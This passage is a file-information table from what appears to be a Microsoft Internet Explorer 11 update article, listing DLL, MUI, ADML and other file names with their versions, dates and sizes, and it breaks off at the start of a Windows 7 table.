\nMshtml.dll| 11.0.9600.20112| 14-Aug-21| 5:07| 25,759,232 \nMshtml.tlb| 11.0.9600.20112| 14-Aug-21| 3:35| 2,724,864 \nIeproxy.dll| 11.0.9600.20112| 14-Aug-21| 2:10| 870,400 \nIeshims.dll| 11.0.9600.20112| 14-Aug-21| 2:15| 387,072 \nIertutil.dll| 11.0.9600.20112| 14-Aug-21| 3:30| 2,916,864 \nSqmapi.dll| 6.2.9200.16384| 19-Aug-21| 20:26| 286,096 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:27| 2,066,432 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 2,121,216 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:29| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:29| 2,063,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:30| 2,314,240 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:31| 2,390,528 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 21:32| 2,033,152 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:31| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 2,255,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:33| 2,061,312 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:33| 2,326,016 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:34| 2,019,840 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:35| 2,071,040 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:35| 2,082,816 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:36| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:37| 2,170,368 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:37| 2,153,984 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:38| 2,291,712 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 2,283,520 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 2,052,096 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:40| 2,301,952 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:40| 2,093,056 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:41| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:42| 2,299,392 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:42| 2,094,592 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:43| 2,316,800 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 2,305,536 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 2,278,912 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:45| 2,285,568 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:46| 2,060,288 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:46| 2,315,776 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:47| 2,279,424 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:47| 2,324,992 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:48| 2,098,176 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:49| 1,890,304 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:50| 1,890,304 \nIeframe.dll| 11.0.9600.20112| 14-Aug-21| 2:52| 15,506,432 \nIeframe.ptxml| Not versioned| 14-Aug-21| 0:50| 24,486 \nInetres.adml| Not versioned| 19-Aug-21| 20:27| 463,373 \nInetres.adml| Not versioned| 19-Aug-21| 20:28| 751,275 \nInetres.adml| Not versioned| 19-Aug-21| 20:28| 526,348 \nInetres.adml| Not versioned| 19-Aug-21| 20:29| 499,703 \nInetres.adml| Not versioned| 19-Aug-21| 20:30| 552,385 \nInetres.adml| Not versioned| 19-Aug-21| 20:30| 944,608 \nInetres.adml| Not versioned| 19-Aug-21| 21:33| 457,561 \nInetres.adml| Not versioned| 19-Aug-21| 20:31| 543,993 \nInetres.adml| Not versioned| 19-Aug-21| 20:32| 751,549 \nInetres.adml| Not versioned| 19-Aug-21| 20:32| 526,607 \nInetres.adml| Not versioned| 19-Aug-21| 20:33| 575,888 \nInetres.adml| Not versioned| 19-Aug-21| 20:34| 463,373 \nInetres.adml| Not versioned| 19-Aug-21| 20:34| 751,415 \nInetres.adml| Not versioned| 19-Aug-21| 20:35| 570,790 \nInetres.adml| Not versioned| 19-Aug-21| 20:36| 548,171 \nInetres.adml| Not versioned| 19-Aug-21| 20:36| 639,283 \nInetres.adml| Not versioned| 19-Aug-21| 20:37| 525,516 \nInetres.adml| Not versioned| 19-Aug-21| 20:38| 751,258 \nInetres.adml| Not versioned| 19-Aug-21| 20:38| 751,415 \nInetres.adml| Not versioned| 19-Aug-21| 20:39| 488,538 \nInetres.adml| Not versioned| 19-Aug-21| 20:39| 548,544 \nInetres.adml| Not versioned| 19-Aug-21| 20:40| 559,392 \nInetres.adml| Not versioned| 19-Aug-21| 20:41| 535,118 \nInetres.adml| Not versioned| 19-Aug-21| 20:41| 541,505 \nInetres.adml| Not versioned| 19-Aug-21| 20:42| 751,201 \nInetres.adml| Not versioned| 19-Aug-21| 20:43| 804,521 \nInetres.adml| Not versioned| 19-Aug-21| 20:43| 751,577 \nInetres.adml| Not versioned| 19-Aug-21| 20:44| 751,384 \nInetres.adml| Not versioned| 19-Aug-21| 20:44| 751,345 \nInetres.adml| Not versioned| 19-Aug-21| 20:45| 503,959 \nInetres.adml| Not versioned| 19-Aug-21| 20:46| 751,347 \nInetres.adml| Not versioned| 19-Aug-21| 20:47| 521,634 \nInetres.adml| Not versioned| 19-Aug-21| 20:47| 751,305 \nInetres.adml| Not versioned| 19-Aug-21| 20:48| 420,094 \nInetres.adml| Not versioned| 19-Aug-21| 20:49| 436,663 \nInetres.admx| Not versioned| 11-Jul-21| 1:55| 1,678,023 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:27| 29,184 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:29| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:30| 35,328 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:31| 37,888 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 21:32| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:31| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:33| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:34| 27,648 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:34| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:35| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:36| 33,792 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:36| 23,040 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:37| 22,016 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:38| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 31,232 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:39| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:40| 35,840 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:41| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:41| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:42| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:43| 34,816 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 32,256 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:44| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:45| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:46| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:47| 30,720 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:47| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:48| 16,384 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:48| 16,896 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:49| 16,896 \nJscript9.dll| 11.0.9600.20112| 14-Aug-21| 3:47| 5,508,096 \nJscript9diag.dll| 11.0.9600.20112| 14-Aug-21| 3:12| 814,592 \nJscript.dll| 5.8.9600.20112| 14-Aug-21| 3:12| 785,408 \nVbscript.dll| 5.8.9600.20112| 14-Aug-21| 3:22| 581,120 \nIexplore.exe| 11.0.9600.20112| 19-Aug-21| 18:56| 810,384 \nMshtml.dll| 11.0.9600.20112| 14-Aug-21| 3:33| 20,294,144 \nMshtml.tlb| 11.0.9600.20112| 14-Aug-21| 3:13| 2,724,864 \nWow64_microsoft-windows-ie-htmlrendering.ptxml| Not versioned| 14-Aug-21| 1:05| 3,228 \nIe9props.propdesc| Not versioned| 21-Mar-21| 3:55| 2,843 \nIeframe.dll| 11.0.9600.20112| 14-Aug-21| 2:47| 13,881,856 \nWow64_ieframe.ptxml| Not versioned| 14-Aug-21| 1:05| 24,486 \nJscript9.dll| 11.0.9600.20112| 14-Aug-21| 2:52| 4,119,040 \nJscript9diag.dll| 11.0.9600.20112| 14-Aug-21| 2:55| 620,032 \nJscript.dll| 5.8.9600.20112| 14-Aug-21| 2:56| 653,824 \nVbscript.dll| 5.8.9600.20112| 14-Aug-21| 3:04| 498,176 \nUrlmon.dll| 11.0.9600.20112| 14-Aug-21| 2:19| 1,342,976 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,592 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 56,320 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 57,856 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 49,664 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 47,616 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 49,152 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 55,296 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 45,056 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 39,424 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 35,840 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 53,760 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 30,720 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 30,720 \nInetcpl.cpl| 11.0.9600.20112| 14-Aug-21| 2:35| 2,058,752 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 307,200 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 293,888 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 290,304 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 299,008 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 303,104 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 282,112 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 283,648 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 291,840 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 299,520 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 275,968 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 293,376 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 258,048 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 256,512 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 288,256 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 285,184 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 297,472 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 288,768 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 286,208 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 281,600 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 286,720 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 292,352 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 242,176 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 243,200 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,080 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 51,712 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 54,272 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:57| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 47,616 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 50,688 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 45,056 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 39,936 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 39,424 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 47,616 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 51,200 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 50,688 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 35,328 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 35,328 \nJsproxy.dll| 11.0.9600.20112| 14-Aug-21| 2:58| 47,104 \nWininet.dll| 11.0.9600.20112| 14-Aug-21| 2:27| 4,387,840 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 114,176 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 130,560 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 124,928 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 122,880 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 130,048 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 138,240 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 114,688 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 131,584 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 117,760 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 122,368 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 134,144 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 107,008 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 123,392 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 127,488 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 128,512 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 88,576 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 82,944 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 125,440 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 123,392 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 120,320 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 130,560 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 125,952 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 128,000 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 124,416 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 121,856 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 115,712 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 125,440 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 72,704 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 73,728 \nMsfeedsbs.dll| 11.0.9600.20112| 14-Aug-21| 2:42| 52,736 \nMsfeedsbs.mof| Not versioned| 14-Aug-21| 1:11| 1,574 \nMsfeedssync.exe| 11.0.9600.20112| 14-Aug-21| 3:04| 11,776 \nIeproxy.dll| 11.0.9600.20112| 14-Aug-21| 2:14| 310,784 \nIeshims.dll| 11.0.9600.20112| 14-Aug-21| 2:18| 290,304 \nIertutil.dll| 11.0.9600.20112| 14-Aug-21| 3:07| 2,308,608 \nSqmapi.dll| 6.2.9200.16384| 19-Aug-21| 18:56| 228,256 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 2,066,432 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 2,121,216 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 2,063,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 2,314,240 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 2,390,528 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 2,033,152 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 2,255,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 2,061,312 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 2,326,016 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 2,019,840 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 2,071,040 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 2,082,816 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 2,170,368 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 2,153,984 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 2,291,712 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 2,283,520 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 2,052,096 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 2,301,952 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 2,093,056 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 2,299,392 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 2,094,592 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 2,316,800 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 2,305,536 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 2,278,912 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 2,285,568 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 2,060,288 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 2,315,776 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 2,279,424 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 2,324,992 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 2,098,176 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 1,890,304 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:20| 1,890,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 29,184 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 35,328 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 37,888 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:57| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 27,648 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 33,792 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 23,040 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 22,016 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 31,232 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 35,840 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 34,816 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 32,256 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 30,720 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 16,384 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 16,896 \nPackage.cab| Not versioned| 19-Aug-21| 22:40| 302,983 \n \n### **Windows 7 and Windows Server 2008 R2**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 